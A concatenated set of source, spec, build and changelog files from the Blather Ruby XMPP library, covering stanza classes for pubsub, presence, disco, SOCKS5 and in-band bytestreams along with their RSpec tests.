i = Blather::Stanza::Iq::Roster::RosterItem.new
expect(i).to respond_to :jid
expect(i.jid).to be_nil
expect(i).to respond_to :jid=
i.jid = 'n@d/r'
expect(i.jid).to eq(Blather::JID.new('n@d/r').stripped)
end
it 'has a name attribute' do
i = Blather::Stanza::Iq::Roster::RosterItem.new
i.name = 'name'
expect(i.name).to eq('name')
end
it 'has a subscription attribute' do
i = Blather::Stanza::Iq::Roster::RosterItem.new
i.subscription = :both
expect(i.subscription).to eq(:both)
end
it 'has an ask attribute' do
i = Blather::Stanza::Iq::Roster::RosterItem.new
i.ask = :subscribe
expect(i.ask).to eq(:subscribe)
end
end
<file_sep>/lib/blather/stanza/pubsub/unsubscribe.rb
module Blather
class Stanza
class PubSub
# # PubSub Unsubscribe Stanza
#
# [XEP-0060 Section 6.2 - Unsubscribe from a Node](http://xmpp.org/extensions/xep-0060.html#subscriber-unsubscribe)
#
# @handler :pubsub_unsubscribe
class Unsubscribe < PubSub
register :pubsub_unsubscribe, :unsubscribe, self.registered_ns
# Create a new unsubscribe node
#
# @param [Blather::Stanza::Iq::VALID_TYPES] type the IQ stanza type
# @param [String] host the host to send the request to
# @param [String] node the node to unsubscribe from
# @param [Blather::JID, #to_s] jid the JID of the unsubscription
# @param [String] subid the subscription ID of the unsubscription
def self.new(type = :set, host = nil, node = nil, jid = nil, subid = nil)
new_node = super(type, host)
new_node.node = node
new_node.jid = jid
new_node.subid = subid
new_node
end
# Get the JID of the unsubscription
#
# @return [Blather::JID]
def jid
JID.new(unsubscribe[:jid])
end
# Set the JID of the unsubscription
#
# @param [Blather::JID, #to_s] jid
def jid=(jid)
unsubscribe[:jid] = jid
end
# Get the name of the node to unsubscribe from
#
# @return [String]
def node
unsubscribe[:node]
end
# Set the name of the node to unsubscribe from
#
# @param [String] node
def node=(node)
unsubscribe[:node] = node
end
# Get the subscription ID to unsubscribe from
#
# @return [String]
def subid
unsubscribe[:subid]
end
# Set the subscription ID to unsubscribe from
#
# @param [String] node
def subid=(subid)
unsubscribe[:subid] = subid
end
# Get or create the actual unsubscribe node
#
# @return [Blather::XMPPNode]
def unsubscribe
unless unsubscribe = pubsub.find_first('ns:unsubscribe', :ns => self.class.registered_ns)
self.pubsub << (unsubscribe = XMPPNode.new('unsubscribe', self.document))
unsubscribe.namespace = self.pubsub.namespace
end
unsubscribe
end
end # Unsubscribe
end # PubSub
end # Stanza
end # Blather
<file_sep>/Rakefile
# -*- ruby -*-
ENV['RUBY_FLAGS'] = "-I#{%w(lib ext bin spec).join(File::PATH_SEPARATOR)}"
require 'rubygems'
require 'bundler/gem_tasks'
require 'bundler/setup'
task :default => :spec
task :test => :spec
require 'rspec/core/rake_task'
RSpec::Core::RakeTask.new
require 'yard'
YARD::Tags::Library.define_tag 'Blather handler', :handler, :with_name
YARD::Templates::Engine.register_template_path 'yard/templates'
YARD::Rake::YardocTask.new(:doc) do |t|
t.options = ['--no-private', '-m', 'markdown', '-o', './doc/public/yard']
end
<file_sep>/spec/blather/stanza/presence_spec.rb
require 'spec_helper'
describe Blather::Stanza::Presence do
it 'registers itself' do
expect(Blather::XMPPNode.class_from_registration(:presence, nil)).to eq(Blather::Stanza::Presence)
end
it 'must be importable' do
expect(Blather::XMPPNode.parse('<presence type="probe"/>')).to be_instance_of Blather::Stanza::Presence
end
it 'ensures type is one of Blather::Stanza::Presence::VALID_TYPES' do
presence = Blather::Stanza::Presence.new
expect { presence.type = :invalid_type_name }.to raise_error(Blather::ArgumentError)
Blather::Stanza::Presence::VALID_TYPES.each do |valid_type|
presence.type = valid_type
expect(presence.type).to eq(valid_type)
end
end
Blather::Stanza::Presence::VALID_TYPES.each do |valid_type|
it "provides a helper (#{valid_type}?) for type #{valid_type}" do
expect(Blather::Stanza::Presence.new).to respond_to :"#{valid_type}?"
end
it "returns true on call to (#{valid_type}?) if type == #{valid_type}" do
method = "#{valid_type}?".to_sym
pres = Blather::Stanza::Presence.new
pres.type = valid_type
expect(pres).to respond_to method
expect(pres.__send__(method)).to eq(true)
end
end
it 'creates a C object when importing a node with a c child' do
string = <<-XML
<presence from='<EMAIL>/globe'>
<c xmlns='http://jabber.org/protocol/caps'
hash='sha-1'
node='http://www.chatopus.com'
ver='zHyEOgxTrkpSdGcQKH8EFPLsriY='/>
</presence>
XML
s = Blather::Stanza::Presence.parse string
expect(s).to be_kind_of Blather::Stanza::Presence::C::InstanceMethods
expect(s.node).to eq('http://www.chatopus.com')
expect(s.handler_hierarchy).to include(:c)
end
it 'creates a Status object when importing a node with type == nil' do
s = Blather::Stanza::Presence.parse('<presence/>')
expect(s).to be_kind_of Blather::Stanza::Presence::Status::InstanceMethods
expect(s.state).to eq(:available)
expect(s.handler_hierarchy).to include(Blather::Stanza::Presence::Status.registered_name.to_sym)
end
it 'creates a Status object when importing a node with type == "unavailable"' do
s = Blather::Stanza::Presence.parse('<presence type="unavailable"/>')
expect(s).to be_kind_of Blather::Stanza::Presence::Status::InstanceMethods
expect(s.state).to eq(:unavailable)
expect(s.handler_hierarchy).to include(Blather::Stanza::Presence::Status.registered_name.to_sym)
end
it 'creates a Subscription object when importing a node with type == "subscribe"' do
s = Blather::Stanza::Presence.parse('<presence type="subscribe"/>')
expect(s).to be_kind_of Blather::Stanza::Presence::Subscription::InstanceMethods
expect(s.type).to eq(:subscribe)
expect(s.handler_hierarchy).to include(Blather::Stanza::Presence::Subscription.registered_name.to_sym)
end
it 'creates a MUC object when importing a node with a form in the MUC namespace' do
string = <<-XML
<presence from='<EMAIL>/globe'>
<x xmlns='http://jabber.org/protocol/muc'/>
</presence>
XML
s = Blather::Stanza::Presence.parse string
expect(s).to be_kind_of Blather::Stanza::Presence::MUC::InstanceMethods
end
it 'creates a MUCUser object when importing a node with a form in the MUC#user namespace' do
string = <<-XML
<presence from='<EMAIL>/globe'>
<x xmlns='http://jabber.org/protocol/muc#user'/>
</presence>
XML
s = Blather::Stanza::Presence.parse string
expect(s).to be_kind_of Blather::Stanza::Presence::MUCUser::InstanceMethods
end
it 'creates a Presence object when importing a node with type equal to something unknown' do
string = "<presence from='<EMAIL>/globe' type='foo'/>"
s = Blather::Stanza::Presence.parse string
expect(s).to be_kind_of Blather::Stanza::Presence
expect(s.type).to eq(:foo)
expect(s.handler_hierarchy).to include(Blather::Stanza::Presence.registered_name.to_sym)
end
it 'behaves like a C, a Status, and a MUCUser when all types of children are present' do
string = <<-XML
<presence from='<EMAIL>@shakes<EMAIL>.lit/globe'>
<show>chat</show>
<c xmlns='http://jabber.org/protocol/caps'
hash='sha-1'
node='http://www.chatopus.com'
ver='zHyEOgxTrkpSdGcQKH8EFPLsriY='/>
<x xmlns='http://jabber.org/protocol/muc#user'>
<item affiliation='none'
jid='<EMAIL>/pda'
role='participant'/>
<status code='100'/>
<status code='110'/>
<password><PASSWORD>>
</x>
</presence>
XML
s = Blather::Stanza::Presence.parse string
expect(s.state).to eq(:chat)
expect(s.node).to eq('http://www.chatopus.com')
expect(s.role).to eq(:participant)
expect(s.handler_hierarchy).to include(Blather::Stanza::Presence::C.registered_name.to_sym)
expect(s.handler_hierarchy).to include(Blather::Stanza::Presence::Status.registered_name.to_sym)
end
it "handle stanzas with nested elements that don't have a decorator module or are not stanzas" do
string = <<-XML
<presence from="<EMAIL>.net/GMX MultiMessenger" to="<EMAIL>/480E24CF" lang="de">
<show>away</show>
<priority>0</priority>
<nick xmlns="http://jabber.org/protocol/nick">Me</nick>
<x xmlns="jabber:x:data" type="submit">
<field var="FORM_TYPE" type="hidden">
<value>http://jabber.org/protocol/profile</value>
</field>
<field var="x-sip_capabilities" type="text-single">
<value>19</value>
</field>
</x>
<x xmlns="vcard-temp:x:update">
<photo/>
</x>
<ignore xmlns="http://gmx.net/protocol/gateway"/>
<delay xmlns="urn:xmpp:delay" from="<EMAIL>/GMX MultiMessenger" stamp="2013-08-26T22:18:41Z"/>
<x xmlns="jabber:x:delay" stamp="20130826T22:18:41"/>
</presence>
XML
s = Blather::Stanza::Presence.parse string
expect(s).to be_a Blather::Stanza::Presence
end
end
<file_sep>/spec/blather/xmpp_node_spec.rb
require 'spec_helper'
describe Blather::XMPPNode do
before { @doc = Nokogiri::XML::Document.new }
it 'generates a node based on the registered_name' do
foo = Class.new(Blather::XMPPNode)
foo.registered_name = 'foo'
expect(foo.new.element_name).to eq('foo')
end
it 'sets the namespace on creation' do
foo = Class.new(Blather::XMPPNode)
foo.registered_ns = 'foo'
expect(foo.new('foo').namespace.href).to eq('foo')
end
it 'registers sub classes' do
class RegistersSubClass < Blather::XMPPNode; register 'foo', 'foo:bar'; end
expect(RegistersSubClass.registered_name).to eq('foo')
expect(RegistersSubClass.registered_ns).to eq('foo:bar')
expect(Blather::XMPPNode.class_from_registration('foo', 'foo:bar')).to eq(RegistersSubClass)
end
it 'imports another node' do
class ImportSubClass < Blather::XMPPNode; register 'foo', 'foo:bar'; end
n = Blather::XMPPNode.new('foo')
n.namespace = 'foo:bar'
expect(Blather::XMPPNode.import(n)).to be_kind_of ImportSubClass
end
it 'can convert itself into a stanza' do
class StanzaConvert < Blather::XMPPNode; register 'foo'; end
n = Blather::XMPPNode.new('foo')
expect(n.to_stanza).to be_kind_of StanzaConvert
end
it 'can parse a string and import it' do
class StanzaParse < Blather::XMPPNode; register 'foo'; end
string = '<foo/>'
n = Nokogiri::XML(string).root
i = Blather::XMPPNode.import n
expect(i).to be_kind_of StanzaParse
p = Blather::XMPPNode.parse string
expect(p).to be_kind_of StanzaParse
end
end
<file_sep>/spec/blather/stanza/pubsub/publish_spec.rb
require 'spec_helper'
require 'fixtures/pubsub'
describe Blather::Stanza::PubSub::Publish do
it 'registers itself' do
expect(Blather::XMPPNode.class_from_registration(:publish, 'http://jabber.org/protocol/pubsub')).to eq(Blather::Stanza::PubSub::Publish)
end
it 'can be imported' do
expect(Blather::XMPPNode.parse(publish_xml)).to be_instance_of Blather::Stanza::PubSub::Publish
end
it 'ensures an publish node is present on create' do
publish = Blather::Stanza::PubSub::Publish.new
expect(publish.find('//ns:pubsub/ns:publish', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
end
it 'ensures an publish node exists when calling #publish' do
publish = Blather::Stanza::PubSub::Publish.new
publish.pubsub.remove_children :publish
expect(publish.find('//ns:pubsub/ns:publish', :ns => Blather::Stanza::PubSub.registered_ns)).to be_empty
expect(publish.publish).not_to be_nil
expect(publish.find('//ns:pubsub/ns:publish', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
end
it 'defaults to a set node' do
publish = Blather::Stanza::PubSub::Publish.new
expect(publish.type).to eq(:set)
end
it 'sets the host if requested' do
publish = Blather::Stanza::PubSub::Publish.new 'pubsub.jabber.local'
expect(publish.to).to eq(Blather::JID.new('pubsub.jabber.local'))
end
it 'sets the node' do
publish = Blather::Stanza::PubSub::Publish.new 'host', 'node-name'
expect(publish.node).to eq('node-name')
end
it 'will iterate over each item' do
publish = Blather::Stanza::PubSub::Publish.new.inherit parse_stanza(publish_xml).root
count = 0
publish.each do |i|
expect(i).to be_instance_of Blather::Stanza::PubSub::PubSubItem
count += 1
end
expect(count).to eq(1)
end
it 'has a node attribute' do
publish = Blather::Stanza::PubSub::Publish.new
expect(publish).to respond_to :node
expect(publish.node).to be_nil
publish.node = 'node-name'
expect(publish.node).to eq('node-name')
expect(publish.xpath('//ns:publish[@node="node-name"]', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
end
it 'can set the payload with a hash' do
payload = {'id1' => 'payload1', 'id2' => 'payload2'}
publish = Blather::Stanza::PubSub::Publish.new
publish.payload = payload
expect(publish.size).to eq(2)
expect(publish.xpath('/iq/ns:pubsub/ns:publish[ns:item[@id="id1" and .="payload1"] and ns:item[@id="id2" and .="payload2"]]', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
end
it 'can set the payload with an array' do
payload = %w[payload1 payload2]
publish = Blather::Stanza::PubSub::Publish.new
publish.payload = payload
expect(publish.size).to eq(2)
expect(publish.xpath('/iq/ns:pubsub/ns:publish[ns:item[.="payload1"] and ns:item[.="payload2"]]', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
end
it 'can set the payload with a string' do
publish = Blather::Stanza::PubSub::Publish.new
publish.payload = 'payload'
expect(publish.size).to eq(1)
expect(publish.xpath('/iq/ns:pubsub/ns:publish[ns:item[.="payload"]]', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
end
end
<file_sep>/examples/trusted_echo.rb
#!/usr/bin/env ruby
require 'rubygems'
require 'blather/client'
setup '<EMAIL>', 'test', 'vines.local', 5222, "./certs"
when_ready { puts "Connected ! send messages to #{jid.stripped}." }
subscription :request? do |s|
write_to_stream s.approve!
end
message :chat?, :body => 'exit' do |m|
say m.from, 'Exiting ...'
shutdown
end
message :chat?, :body do |m|
say m.from, "You sent: #{m.body}"
end
<file_sep>/lib/blather/stanza/iq/s5b.rb
module Blather
class Stanza
class Iq
# # SOCKS5 Bytestreams Stanza
#
# [XEP-0065: SOCKS5 Bytestreams](http://xmpp.org/extensions/xep-0065.html)
#
# @handler :s5b_open
class S5b < Query
# @private
NS_S5B = 'http://jabber.org/protocol/bytestreams'
register :s5b_open, :query, NS_S5B
# Overrides the parent method to remove query node
#
# @see Blather::Stanza#reply
def reply
reply = super
reply.remove_children :query
reply
end
# Get the sid of the file transfer
#
# @return [String]
def sid
query['sid']
end
# Get the used streamhost
#
# @return [S5b::StreamHostUsed]
def streamhost_used
StreamHostUsed.new query.find_first('.//ns:streamhost-used', :ns => self.class.registered_ns)
end
# Set the used streamhost
#
# @param [Blather::JID, String, nil] jid the jid of the used streamhost
def streamhost_used=(jid)
query.find('.//ns:streamhost-used', :ns => self.class.registered_ns).remove
if jid
query << StreamHostUsed.new(jid)
end
end
# Get the streamhosts
#
# @return [Array<S5b::StreamHost>]
def streamhosts
query.find('.//ns:streamhost', :ns => self.class.registered_ns).map do |s|
StreamHost.new s
end
end
# Set the streamhosts
#
# @param streamhosts the array of streamhosts, passed directly to StreamHost.new
def streamhosts=(streamhosts)
query.find('.//ns:streamhost', :ns => self.class.registered_ns).remove
if streamhosts
[streamhosts].flatten.each { |s| self.query << StreamHost.new(s) }
end
end
# StreamHost Stanza
class StreamHost < XMPPNode
register 'streamhost', NS_S5B
# Create a new S5b::StreamHost
#
# @overload new(node)
# Create a new StreamHost by inheriting an existing node
# @param [XML::Node] node an XML::Node to inherit from
# @overload new(opts)
# Create a new StreamHost through a hash of options
# @param [Hash] opts a hash options
# @option opts [Blather::JID, String] :jid the JID of the StreamHost
# @option opts [#to_s] :host the host the StreamHost
# @option opts [#to_s] :port the post of the StreamHost
# @overload new(jid, host = nil, port = nil)
# Create a new StreamHost
# @param [Blather::JID, String] jid the JID of the StreamHost
# @param [#to_s] host the host the StreamHost
# @param [#to_s] port the post of the StreamHost
def self.new(jid, host = nil, port = nil)
new_node = super 'streamhost'
case jid
when Nokogiri::XML::Node
new_node.inherit jid
when Hash
new_node.jid = jid[:jid]
new_node.host = jid[:host]
new_node.port = jid[:port]
else
new_node.jid = jid
new_node.host = host
new_node.port = port
end
new_node
end
# Get the jid of the streamhost
#
# @return [Blather::JID, nil]
def jid
if j = read_attr(:jid)
JID.new(j)
else
nil
end
end
# Set the jid of the streamhost
#
# @param [Blather::JID, String, nil]
def jid=(j)
write_attr :jid, (j ? j.to_s : nil)
end
# Get the host address of the streamhost
#
# @return [String, nil]
def host
read_attr :host
end
# Set the host address of the streamhost
#
# @param [String, nil]
def host=(h)
write_attr :host, h
end
# Get the port of the streamhost
#
# @return [Fixnum, nil]
def port
if p = read_attr(:port)
p.to_i
else
nil
end
end
# Set the port of the streamhost
#
# @param [String, Fixnum, nil]
def port=(p)
write_attr :port, p
end
end
# Stream host used stanza
class StreamHostUsed < XMPPNode
register 'streamhost-used', NS_S5B
# Create a new S5b::StreamHostUsed
#
# @overload new(node)
# Create a new StreamHostUsed by inheriting an existing node
# @param [XML::Node] node an XML::Node to inherit from
# @overload new(opts)
# Create a new StreamHostUsed through a hash of options
# @param [Hash] opts a hash options
# @option opts [Blather::JID, String] :jid the JID of the StreamHostUsed
# @overload new(jid)
# Create a new StreamHostUsed
# @param [Blather::JID, String] jid the JID of the StreamHostUsed
def self.new(jid)
new_node = super 'streamhost-used'
case jid
when Nokogiri::XML::Node
new_node.inherit jid
when Hash
new_node.jid = jid[:jid]
else
new_node.jid = jid
end
new_node
end
# Get the jid of the used streamhost
#
# @return [Blather::JID, nil]
def jid
if j = read_attr(:jid)
JID.new(j)
else
nil
end
end
# Set the jid of the used streamhost
#
# @param [Blather::JID, String, nil]
def jid=(j)
write_attr :jid, (j ? j.to_s : nil)
end
end
end
end
end
end
<file_sep>/lib/blather/stanza/disco/disco_items.rb
module Blather
class Stanza
# # DiscoItems Stanza
#
# [XEP-0030 Disco Info](http://xmpp.org/extensions/xep-0030.html#items)
#
# Disco Items node that provides or retreives items associated with a
# jabbery entity
#
# @handler :disco_items
class DiscoItems < Disco
register :disco_items, nil, 'http://jabber.org/protocol/disco#items'
# Create a new DiscoItems node
#
# @param [#to_s] type the IQ type
# @param [#to_s] node the node the items are associated with
# @param [Array<Blather::XMPPNode>] items an array of Disco::Items
# @return [Blather::Stanza::DiscoItems]
def self.new(type = nil, node = nil, items = [])
new_node = super type
new_node.node = node
new_node.items = [items]
new_node
end
# Set of items associated with the node
#
# @return [Array<Blather::Stanza::DiscoItems::Item>]
def items
query.find('//ns:item', :ns => self.class.registered_ns).map do |i|
Item.new i
end
end
# Add an array of items
# @param items the array of items, passed directly to Item.new
def items=(items)
query.find('//ns:item', :ns => self.class.registered_ns).each &:remove
if items
[items].flatten.each { |i| self.query << Item.new(i) }
end
end
# An individual Disco Item
class Item < XMPPNode
# Create a new Blather::Stanza::DiscoItems::Item
#
# @overload new(node)
# Create a new Item by inheriting an existing node
# @param [XML::Node] node an XML::Node to inherit from
# @overload new(opts)
# Create a new Item through a hash of options
# @param [Hash] opts a hash options
# @option opts [Blather::JID, String] :jid the JID to attach to the item
# @option opts [#to_s] :node the node the item is attached to
# @option opts [#to_S] :name the name of the Item
# @overload new(jid, node = nil, name = nil)
# Create a new Item
# @param [Blather::JID, String] jid the JID to attach to the item
# @param [#to_s] node the node the item is attached to
# @param [#to_s] name the name of the Item
def self.new(jid, node = nil, name = nil)
return jid if jid.class == self
new_node = super :item
case jid
when Nokogiri::XML::Node
new_node.inherit jid
when Hash
new_node.jid = jid[:jid]
new_node.node = jid[:node]
new_node.name = jid[:name]
else
new_node.jid = jid
new_node.node = node
new_node.name = name
end
new_node
end
# Get the JID attached to the node
#
# @return [Blather::JID, nil]
def jid
(j = self[:jid]) ? JID.new(j) : nil
end
# Set the JID of the node
#
# @param [Blather::JID, String, nil] jid the new JID
def jid=(jid)
write_attr :jid, jid
end
# Get the name of the node
#
# @return [String, nil]
def node
read_attr :node
end
# Set the name of the node
#
# @param [String, nil] node the new node name
def node=(node)
write_attr :node, node
end
# Get the Item name
#
# @return [String, nil]
def name
read_attr :name
end
# Set the Item name
#
# @param [#to_s] name the Item name
def name=(name)
write_attr :name, name
end
# Compare two DiscoItems::Item objects by name, type and category
# @param [DiscoItems::Item] o the Identity object to compare against
# @return [true, false]
def eql?(o, *fields)
super o, *(fields + [:jid, :node, :name])
end
end
end
end #Stanza
end #Blather
<file_sep>/spec/blather/stanza/presence/muc_user_spec.rb
require 'spec_helper'
def muc_user_xml
<<-XML
<presence from='<EMAIL>/pda'
id='n13mt3l'
to='<EMAIL>/thirdwitch'>
<x xmlns='http://jabber.org/protocol/muc#user'>
<item affiliation='none'
jid='hag66@shakespeare.lit/pda'
role='participant'/>
<status code='100'/>
<status code='110'/>
<password><PASSWORD></password>
</x>
</presence>
XML
end
describe 'Blather::Stanza::Presence::MUCUser' do
it 'must be importable' do
muc_user = Blather::XMPPNode.parse(muc_user_xml)
expect(muc_user).to be_kind_of Blather::Stanza::Presence::MUCUser::InstanceMethods
expect(muc_user.affiliation).to eq(:none)
expect(muc_user.jid).to eq('hag66@shakespeare.lit/pda')
expect(muc_user.role).to eq(:participant)
expect(muc_user.status_codes).to eq([100, 110])
expect(muc_user.password).to eq('<PASSWORD>')
end
it 'ensures a form node is present on create' do
c = Blather::Stanza::Presence::MUCUser.new
expect(c.xpath('ns:x', :ns => Blather::Stanza::Presence::MUCUser.registered_ns)).not_to be_empty
end
it 'ensures a form node exists when calling #muc' do
c = Blather::Stanza::Presence::MUCUser.new
c.remove_children :x
expect(c.xpath('ns:x', :ns => Blather::Stanza::Presence::MUCUser.registered_ns)).to be_empty
expect(c.muc_user).not_to be_nil
expect(c.xpath('ns:x', :ns => Blather::Stanza::Presence::MUCUser.registered_ns)).not_to be_empty
end
it "must be able to set the affiliation" do
muc_user = Blather::Stanza::Presence::MUCUser.new
expect(muc_user.affiliation).to eq(nil)
muc_user.affiliation = :none
expect(muc_user.affiliation).to eq(:none)
end
it "must be able to set the role" do
muc_user = Blather::Stanza::Presence::MUCUser.new
expect(muc_user.role).to eq(nil)
muc_user.role = :participant
expect(muc_user.role).to eq(:participant)
end
it "must be able to set the jid" do
muc_user = Blather::Stanza::Presence::MUCUser.new
expect(muc_user.jid).to eq(nil)
muc_user.jid = '<EMAIL>'
expect(muc_user.jid).to eq('<EMAIL>')
end
it "must be able to set the status codes" do
muc_user = Blather::Stanza::Presence::MUCUser.new
expect(muc_user.status_codes).to eq([])
muc_user.status_codes = [100, 110]
expect(muc_user.status_codes).to eq([100, 110])
muc_user.status_codes = [500]
expect(muc_user.status_codes).to eq([500])
end
it "must be able to set the password" do
muc_user = Blather::Stanza::Presence::MUCUser.new
expect(muc_user.password).to eq(nil)
muc_user.password = '<PASSWORD>'
expect(muc_user.password).to eq('<PASSWORD>')
muc_user.password = '<PASSWORD>'
expect(muc_user.password).to eq('<PASSWORD>')
end
end
<file_sep>/spec/blather/jid_spec.rb
require 'spec_helper'
describe Blather::JID do
it 'does nothing if creaded from Blather::JID' do
jid = Blather::JID.new 'n@d/r'
expect(Blather::JID.new(jid).object_id).to eq(jid.object_id)
end
it 'creates a new Blather::JID from (n,d,r)' do
jid = Blather::JID.new('n', 'd', 'r')
expect(jid.node).to eq('n')
expect(jid.domain).to eq('d')
expect(jid.resource).to eq('r')
end
it 'creates a new Blather::JID from (n,d)' do
jid = Blather::JID.new('n', 'd')
expect(jid.node).to eq('n')
expect(jid.domain).to eq('d')
end
it 'creates a new Blather::JID from (n@d)' do
jid = Blather::JID.new('n@d')
expect(jid.node).to eq('n')
expect(jid.domain).to eq('d')
end
it 'creates a new Blather::JID from (n@d/r)' do
jid = Blather::JID.new('n@d/r')
expect(jid.node).to eq('n')
expect(jid.domain).to eq('d')
expect(jid.resource).to eq('r')
end
it 'requires at least a node' do
expect { Blather::JID.new }.to raise_error ::ArgumentError
end
it 'ensures length of node is no more than 1023 characters' do
expect { Blather::JID.new('n'*1024) }.to raise_error Blather::ArgumentError
end
it 'ensures length of domain is no more than 1023 characters' do
expect { Blather::JID.new('n', 'd'*1024) }.to raise_error Blather::ArgumentError
end
it 'ensures length of resource is no more than 1023 characters' do
expect { Blather::JID.new('n', 'd', 'r'*1024) }.to raise_error Blather::ArgumentError
end
it 'compares Blather::JIDs' do
expect(Blather::JID.new('a@b/c') <=> Blather::JID.new('d@e/f')).to eq(-1)
expect(Blather::JID.new('a@b/c') <=> Blather::JID.new('a@b/c')).to eq(0)
expect(Blather::JID.new('d@e/f') <=> Blather::JID.new('a@b/c')).to eq(1)
end
it 'checks for equality' do
expect(Blather::JID.new('n@d/r') == Blather::JID.new('n@d/r')).to eq(true)
expect(Blather::JID.new('n@d/r').eql?(Blather::JID.new('n@d/r'))).to eq(true)
end
it 'will strip' do
jid = Blather::JID.new('n@d/r')
expect(jid.stripped).to eq(Blather::JID.new('n@d'))
expect(jid).to eq(Blather::JID.new('n@d/r'))
end
it 'will strip itself' do
jid = Blather::JID.new('n@d/r')
jid.strip!
expect(jid).to eq(Blather::JID.new('n@d'))
end
it 'has a string representation' do
expect(Blather::JID.new('n@d/r').to_s).to eq('n@d/r')
expect(Blather::JID.new('n', 'd', 'r').to_s).to eq('n@d/r')
expect(Blather::JID.new('n', 'd').to_s).to eq('n@d')
end
it 'provides a #stripped? helper' do
jid = Blather::JID.new 'a@b/c'
expect(jid).to respond_to :stripped?
expect(jid.stripped?).not_to equal true
jid.strip!
expect(jid.stripped?).to eq(true)
end
end
<file_sep>/spec/blather/stanza/pubsub/affiliations_spec.rb
require 'spec_helper'
require 'fixtures/pubsub'
def control_affiliations
{ :owner => ['node1', 'node2'],
:publisher => ['node3'],
:outcast => ['node4'],
:member => ['node5'],
:none => ['node6'] }
end
describe Blather::Stanza::PubSub::Affiliations do
it 'registers itself' do
expect(Blather::XMPPNode.class_from_registration(:affiliations, Blather::Stanza::PubSub.registered_ns)).to eq(Blather::Stanza::PubSub::Affiliations)
end
it 'can be imported' do
expect(Blather::XMPPNode.parse(affiliations_xml)).to be_instance_of Blather::Stanza::PubSub::Affiliations
end
it 'ensures an affiliations node is present on create' do
affiliations = Blather::Stanza::PubSub::Affiliations.new
expect(affiliations.find_first('//ns:affiliations', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_nil
end
it 'ensures an affiliations node exists when calling #affiliations' do
affiliations = Blather::Stanza::PubSub::Affiliations.new
affiliations.pubsub.remove_children :affiliations
expect(affiliations.find_first('//ns:affiliations', :ns => Blather::Stanza::PubSub.registered_ns)).to be_nil
expect(affiliations.affiliations).not_to be_nil
expect(affiliations.find_first('//ns:affiliations', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_nil
end
it 'defaults to a get node' do
expect(Blather::Stanza::PubSub::Affiliations.new.type).to eq(:get)
end
it 'sets the host if requested' do
aff = Blather::Stanza::PubSub::Affiliations.new :get, 'pubsub.jabber.local'
expect(aff.to).to eq(Blather::JID.new('pubsub.jabber.local'))
end
it 'can import an affiliates result node' do
node = parse_stanza(affiliations_xml).root
affiliations = Blather::Stanza::PubSub::Affiliations.new.inherit node
expect(affiliations.size).to eq(5)
expect(affiliations.list).to eq(control_affiliations)
end
it 'will iterate over each affiliation' do
Blather::XMPPNode.parse(affiliations_xml).each do |type, nodes|
expect(nodes).to eq(control_affiliations[type])
end
end
end
<file_sep>/lib/blather/file_transfer/ibb.rb
require "base64"
module Blather
class FileTransfer
# In-Band Bytestreams Transfer helper
# Takes care of accepting, declining and offering file transfers through the stream
class Ibb
def initialize(stream, iq)
@stream = stream
@iq = iq
@seq = 0
end
# Accept an incoming file-transfer
#
# @param [module] handler the handler for incoming data, see Blather::FileTransfer::SimpleFileReceiver for an example
# @param [Array] params the params to be passed into the handler
def accept(handler, *params)
@io_read, @io_write = IO.pipe
EM::attach @io_read, handler, *params
@stream.register_handler :ibb_data, :from => @iq.from, :sid => @iq.sid do |iq|
if iq.data['seq'] == @seq.to_s
begin
@io_write << Base64.decode64(iq.data.content)
@stream.write iq.reply
@seq += 1
@seq = 0 if @seq > 65535
rescue Errno::EPIPE => e
@stream.write StanzaError.new(iq, 'not-acceptable', :cancel).to_node
end
else
@stream.write StanzaError.new(iq, 'unexpected-request', :wait).to_node
end
true
end
@stream.register_handler :ibb_close, :from => @iq.from, :sid => @iq.sid do |iq|
@stream.write iq.reply
@stream.clear_handlers :ibb_data, :from => @iq.from, :sid => @iq.sid
@stream.clear_handlers :ibb_close, :from => @iq.from, :sid => @iq.sid
@io_write.close
true
end
@stream.clear_handlers :ibb_open, :from => @iq.from
@stream.clear_handlers :ibb_open, :from => @iq.from, :sid => @iq.sid
@stream.write @iq.reply
end
# Decline an incoming file-transfer
def decline
@stream.clear_handlers :ibb_open, :from => @iq.from
@stream.clear_handlers :ibb_data, :from => @iq.from, :sid => @iq.sid
@stream.clear_handlers :ibb_close, :from => @iq.from, :sid => @iq.sid
@stream.write StanzaError.new(@iq, 'not-acceptable', :cancel).to_node
end
# Offer a file to somebody, not implemented yet
def offer
# TODO: implement
end
end
end
end
<file_sep>/CHANGELOG.md
# [develop](https://github.com/adhearsion/blather/compare/master...develop)
* No default [chat state](https://xmpp.org/extensions/xep-0085.html) on new messages, if you want one you need to set it. Blather version 2.0 and prior set this value to `active`
* jabber:client and jabber:component:accept namespaces are no longer erased when parsing, so if you manually select nodes assuming there will be no namespace for these, you need to update
* Breaking change (for release in v3.0.0): Falsy handler return value no longer causes passing to the next handler. Use `pass` explicitly for that.
* Breaking change (for release in v3.0.0): Blather::Client uses EM.defer instead of sucker_punch for threadpool, or else no threads when passed async: true
* Bugfix: Blather::Stanza::X#find_or_create only looks at immediate children of parent now
* Feature: Blather::Stanza::X::Field values can be arrays to support multiple-valued fields
* Feature: Add Blather::Stanza::Iq::IBR to implement XEP-0077 In-Band Registration
* Bugfix: Starttls when offered by server; including when the unsecured stream features start with a <method>
* Bugfix: Parser does not drop attribute namespaces
# [v2.0.0](https://github.com/adhearsion/blather/compare/v1.2.0...v2.0.0) - [2018-06-18](https://rubygems.org/gems/blather/versions/2.0.0)
* Bugfix: Require EventMachine >= 1.2.6 to avoid segfault issue
* Bugfix: Fix unsafe threaded use of @tmp_handlers in Blather::Client
* Feature: Bump RSpec to 3.x and convert specs with Transpec
* Feature: Bump Mocha version to 1.x
* Feature: Switch from girl_friday to sucker_punch
* Feature: Unlock Nokogiri to allow >=1.8.3 now that issues are fixed upstream
# [v1.2.0](https://github.com/adhearsion/blather/compare/v1.1.4...v1.2.0) - [2016-01-07](https://rubygems.org/gems/blather/versions/1.2.0)
* Bugfix: Properly sort resources with the same priority but different status
* Bugfix: Lock to Nokogiri <= 1.6.1 because new versions are more broken than old ones
* Bugfix: Avoid repeatedly parsing nodes which are already parsed
